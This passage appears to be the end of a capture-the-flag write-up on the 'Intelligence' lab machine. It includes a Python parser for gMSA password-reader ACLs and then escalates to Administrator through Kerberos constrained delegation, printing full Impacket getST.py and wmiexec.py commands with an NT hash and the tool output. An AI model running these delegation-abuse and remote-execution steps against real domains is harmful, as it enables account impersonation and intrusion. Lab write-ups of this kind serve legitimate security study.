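    """Decode the binary SID at buf[off:]; return (S-1-... string, byte length)."""
    revision, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join(f"-{s}" for s in subs), 8 + 4 * count


def parse_security_descriptor(sd):
    """Return owner/group SIDs and the DACL's ACEs (type, flags, mask, sid)."""
    revision, _sbz1, control, off_owner, off_group, _off_sacl, off_dacl = \
        struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_SELF_RELATIVE:
        raise ValueError("expected a self-relative security descriptor")
    result = {"revision": revision, "control": control,
              "owner": parse_sid(sd, off_owner)[0] if off_owner else None,
              "group": parse_sid(sd, off_group)[0] if off_group else None,
              "aces": []}
    if control & SE_DACL_PRESENT and off_dacl:
        # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2 (8 bytes)
        _rev, _sbz, acl_size, ace_count, _sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
        pos = off_dacl + 8
        for _ in range(ace_count):
            ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", sd, pos)
            mask, sid = None, None
            if ace_type in (ACCESS_ALLOWED_ACE_TYPE, ACCESS_DENIED_ACE_TYPE):
                (mask,) = struct.unpack_from("<I", sd, pos + 4)
                sid = parse_sid(sd, pos + 8)[0]
            # object-specific ACE types are left undecoded; none are expected here
            result["aces"].append({"type": ace_type, "flags": ace_flags, "mask": mask, "sid": sid})
            pos += ace_size
        if pos != off_dacl + acl_size:
            raise ValueError("ACL size does not match the ACEs read")
    return result


def parse_membership(b64):
    """Parse the base64 form ldapsearch prints for msDS-GroupMSAMembership."""
    return parse_security_descriptor(base64.b64decode(b64))


def password_readers(b64):
    """SIDs granted by ACCESS_ALLOWED ACEs, i.e. who may retrieve the gMSA password."""
    return [a["sid"] for a in parse_membership(b64)["aces"]
            if a["type"] == ACCESS_ALLOWED_ACE_TYPE and a["sid"]]


def sid_from_ldif(b64):
    """Decode a base64 objectSid as printed by ldapsearch ('objectSid:: ...')."""
    return parse_sid(base64.b64decode(b64), 0)[0]


# Values for svc_int exactly as returned by the ldapsearch in this writeup.
SVC_INT_MEMBERSHIP = "AQAEgBQAAAAAAAAAAAAAACQAAAABAgAAAAAABSAAAAAgAgAABABQAAIAAAAAACQA/wEPAAEFAAAAAAAFFQAAAEaG8fp0Fw3KRmPkzOgDAAAAACQA/wEPAAEFAAAAAAAFFQAAAEaG8fp0Fw3KRmPkzHYEAAA="
SVC_INT_OBJECTSID = "AQUAAAAAAAUVAAAARobx+nQXDcpGY+TMeAQAAA=="

if __name__ == "__main__":
    print("svc_int$ objectSid:", sid_from_ldif(SVC_INT_OBJECTSID))
    for sid in password_readers(SVC_INT_MEMBERSHIP):
        # Resolve each SID against objectSid in the directory to get the account/group name.
        print("may read msDS-ManagedPassword:", sid)
```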

svc_int$ also carries the attribute msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb, which means the service account is likely configured for constrained delegation: through the S4U2self extension it can obtain from the KDC a service ticket (ST) for a user to the trusted SPN (WWW/dc.intelligence.htb).

We can obtain a service ticket for Administrator with Impacket's getST.py:

$ python3 ~/tools/impacket/examples/getST.py -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

Finally, use Impacket's wmiexec.py to run a command on the target host and read root.txt:

$ export KRB5CCNAME=Administrator.ccache
$ python3 ~/tools/impacket/examples/wmiexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb 'type c:\users\administrator\desktop\root.txt'
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
50d8d8b0edcb7b8e79c417e864b473b3

References

[MS-DNSP]: dnsRecord

Windows Authentication

Group Managed Service Accounts Overview

IIS Authentication and ASP.NET Authentication

NTLM Relaying for gMSA Passwords

Kerberos Constrained Delegation

Using Kerberos golden tickets on Linux

S4U2self Extension